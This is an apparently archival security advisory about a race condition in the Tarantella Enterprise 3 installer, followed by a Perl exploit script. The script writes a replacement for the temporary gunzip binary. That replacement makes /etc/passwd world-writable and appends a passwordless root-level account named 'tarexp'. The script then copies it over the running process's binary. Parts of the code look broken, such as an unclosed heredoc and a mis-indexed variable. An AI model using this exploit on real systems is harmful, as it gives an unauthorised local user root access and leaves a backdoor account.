Tarantella Enterprise 3 is vulnerable to a race condition during the installation process. During installation, a root owned binary is created in /tmp (the directory specified by the $TMPDIR environment variable) with the name gunzip#### where #### is a PID. Prior to it being invoked by the installation program it can be overwritten by a local user. This is then run by the installation program with root privileges.
An attacker can only gain privileges in this manner if a privileged user is installing the software.
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar firstname.lastname@example.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#Experimental ext3 kernel mods for preventing/researching race conditions.
`cat << -EOF- > root.sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
my $OUT = '';
$OUT = `ps -ax |grep gunzip |grep -v grep`;
print "Found $OUT\n";
my @args = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
`cp root.sh $args`;